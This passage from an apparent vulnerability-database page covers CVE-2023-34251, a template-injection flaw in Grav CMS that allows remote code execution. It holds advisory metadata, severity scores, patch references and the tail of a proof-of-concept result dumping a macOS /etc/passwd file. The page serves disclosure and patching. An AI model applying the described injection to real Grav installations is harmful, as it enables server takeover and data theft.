User:/var/empty:/usr/bin/false _cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false _svn:*:73:73:SVN Server:/var/empty:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver:*:79:79:Application Server:/var/empty:/usr/bin/false _clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false _windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false _spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false _tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent:*:92:92:SecurityAgent:/var/db/securityagent:/usr/bin/false _calendar:*:93:93:Calendar:/var/empty:/usr/bin/false _teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false _installer:*:96:-2:Installer:/var/empty:/usr/bin/false _atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _softwareupdate:*:200:200:Software Update Service:/var/db/softwareupdate:/usr/bin/false _coreaudiod:*:202:202:Core Audio Daemon:/var/empty:/usr/bin/false _screensaver:*:203:203:Screensaver:/var/empty:/usr/bin/false _locationd:*:205:205:Location Daemon:/var/db/locationd:/usr/bin/false _trustevaluationagent:*:208:208:Trust Evaluation Agent:/var/empty:/usr/bin/false _timezone:*:210:210:AutoTimeZoneDaemon:/var/empty:/usr/bin/false _lda:*:211:211:Local Delivery Agent:/var/empty:/usr/bin/false _cvmsroot:*:212:212:CVMS Root:/var/empty:/usr/bin/false _usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _dovecot:*:214:6:Dovecot Administrator:/var/empty:/usr/bin/false _dpaudio:*:215:215:DP Audio:/var/empty:/usr/bin/false _postgres:*:216:216:PostgreSQL Server:/var/empty:/usr/bin/false _krbtgt:*:217:-2:Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _kadmin_admin:*:218:-2:Kerberos Admin Service:/var/empty:/usr/bin/false _kadmin_changepw:*:219:-2:Kerberos Change Password Service:/var/empty:/usr/bin/false _devicemgr:*:220:220:Device Management Server:/var/empty:/usr/bin/false _webauthserver:*:221:221:Web Auth Server:/var/empty:/usr/bin/false _netbios:*:222:222:NetBIOS:/var/empty:/usr/bin/false _warmd:*:224:224:Warm Daemon:/var/empty:/usr/bin/false _dovenull:*:227:227:Dovecot Authentication:/var/empty:/usr/bin/false _netstatistics:*:228:228:Network Statistics Daemon:/var/empty:/usr/bin/false _avbdeviced:*:229:-2:Ethernet AVB Device Daemon:/var/empty:/usr/bin/false _krb_krbtgt:*:230:-2:Open Directory Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _krb_kadmin:*:231:-2:Open Directory Kerberos Admin Service:/var/empty:/usr/bin/false _krb_changepw:*:232:-2:Open Directory Kerberos Change Password Service:/var/empty:/usr/bin/false _krb_kerberos:*:233:-2:Open Directory Kerberos:/var/empty:/usr/bin/false _krb_anonymous:*:234:-2:Open Directory Kerberos Anonymous:/var/empty:/usr/bin/false _assetcache:*:235:235:Asset Cache Service:/var/empty:/usr/bin/false _coremediaiod:*:236:236:Core Media IO Daemon:/var/empty:/usr/bin/false _launchservicesd:*:239:239:_launchservicesd:/var/empty:/usr/bin/false _iconservices:*:240:240:IconServices:/var/empty:/usr/bin/false _distnote:*:241:241:DistNote:/var/empty:/usr/bin/false _nsurlsessiond:*:242:242:NSURLSession Daemon:/var/db/nsurlsessiond:/usr/bin/false _displaypolicyd:*:244:244:Display Policy Daemon:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _krbfast:*:246:-2:Kerberos FAST Account:/var/empty:/usr/bin/false _gamecontrollerd:*:247:247:Game Controller Daemon:/var/empty:/usr/bin/false _mbsetupuser:*:248:248:Setup User:/var/setup:/bin/bash _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _xserverdocs:*:251:251:macOS Server Documents Service:/var/empty:/usr/bin/false _wwwproxy:*:252:252:WWW Proxy:/var/empty:/usr/bin/false _mobileasset:*:253:253:MobileAsset User:/var/ma:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _ctkd:*:259:259:ctkd Account:/var/empty:/usr/bin/false _applepay:*:260:260:applepay Account:/var/db/applepay:/usr/bin/false _hidd:*:261:261:HID Service User:/var/db/hidd:/usr/bin/false _cmiodalassistants:*:262:262:CoreMedia IO Assistants User:/var/db/cmiodalassistants:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _fpsd:*:265:265:FPS Daemon:/var/db/fpsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _nearbyd:*:268:268:Proximity and Ranging Daemon:/var/db/nearbyd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/db/reportmemoryexception:/usr/bin/false _driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _appinstalld:*:273:273:App Install Daemon:/var/db/appinstalld:/usr/bin/false _installcoordinationd:*:274:274:Install Coordination Daemon:/var/db/installcoordinationd:/usr/bin/false _demod:*:275:275:Demo Daemon:/var/empty:/usr/bin/false _rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater:*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/db/coreml:/usr/bin/false _sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd:*:282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false _avphidbridge:*:288:288:Apple Virtual Platform HID Bridge:/var/empty:/usr/bin/false _biome:*:289:289:Biome:/var/db/biome:/usr/bin/false _backgroundassets:*:291:291:Background Assets Service:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false\n```\n\n#### PoC Video\n- [PoC Video](https://drive.google.com/file/d/1wsmv7abdGc8WdYLNPPC5GrFcybhCORf2/view?usp=sharing)\n\n### Impact\nRemote Command Execution (RCE) is possible.\n\n### Occurrences\n- https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\n\n### References\n- [PortSwigger: Server-side template injection](https://portswigger.net/web-security/server-side-template-injection)\n- [HackTricks: SSTI (Server Side Template Injection)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php)\n",
  "id": "GHSA-f9jf-4cp4-4fq5",
  "modified": "2023-06-16T19:35:56Z",
  "published": "2023-06-16T19:35:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34251"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Grav Server Side Template Injection (SSTI) vulnerability"
}

fkie_cve-2023-34251

Vulnerability from fkie_nvd

Published

2023-06-14 22:15

Modified

2024-11-21 08:06

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174	Vendor Advisory
security-advisories@github.com	https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5	Patch
security-advisories@github.com	https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	getgrav	grav	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "758F84B9-A2EC-45D8-86DD-B309DB02B9AE",
              "versionEndExcluding": "1.7.42",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue."
    }
  ],
  "id": "CVE-2023-34251",
  "lastModified": "2024-11-21T08:06:51.773",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-06-14T22:15:09.333",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

gsd-2023-34251

Vulnerability from gsd

Modified

2023-12-13 01:20

Details

Aliases

CVE-2023-34251

Aliases

CVE-2023-34251

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-34251",
    "id": "GSD-2023-34251"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-34251"
      ],
      "details": "Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.",
      "id": "GSD-2023-34251",
      "modified": "2023-12-13T01:20:31.084603Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-34251",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "grav",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 1.7.42"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "getgrav"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-94",
                "lang": "eng",
                "value": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5",
            "refsource": "MISC",
            "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"
          },
          {
            "name": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
            "refsource": "MISC",
            "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
          },
          {
            "name": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174",
            "refsource": "MISC",
            "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-f9jf-4cp4-4fq5",
        "discovery": "UNKNOWN"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c1.7.42",
          "affected_versions": "All versions before 1.7.42",
          "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "cwe_ids": [
            "CWE-1035",
            "CWE-78",
            "CWE-937",
            "CWE-94"
          ],
          "date": "2023-06-16",
          "description": "Grav is a flat-file content management system. Versions prior to 1.7.42 is vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.",
          "fixed_versions": [
            "1.7.42"
          ],
          "identifier": "CVE-2023-34251",
          "identifiers": [
            "GHSA-f9jf-4cp4-4fq5",
            "CVE-2023-34251"
          ],
          "not_impacted": "All versions starting from 1.7.42",
          "package_slug": "packagist/getgrav/grav",
          "pubdate": "2023-06-16",
          "solution": "Upgrade to version 1.7.42 or above.",
          "title": "Improper Control of Generation of Code (\u0027Code Injection\u0027)",
          "urls": [
            "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5",
            "https://nvd.nist.gov/vuln/detail/CVE-2023-34251",
            "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec",
            "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
            "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8",
            "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
            "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174",
            "https://github.com/advisories/GHSA-f9jf-4cp4-4fq5"
          ],
          "uuid": "2b3a0f01-12e6-4b8d-8f1b-23f047ba62b2"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.7.42",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2023-34251"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-94"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Vendor Advisory"
              ],
              "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"
            },
            {
              "name": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174",
              "refsource": "MISC",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"
            },
            {
              "name": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-06-22T21:11Z",
      "publishedDate": "2023-06-14T22:15Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2023-34251 (GCVE-0-2023-34251)

Vulnerability from cvelistv5

ghsa-f9jf-4cp4-4fq5

Vulnerability from github

Summary

Details

PoC

Execution Result

PoC Video

Impact

Occurrences

References

fkie_cve-2023-34251

Vulnerability from fkie_nvd

gsd-2023-34251

Vulnerability from gsd

Tags

Sightings

Nomenclature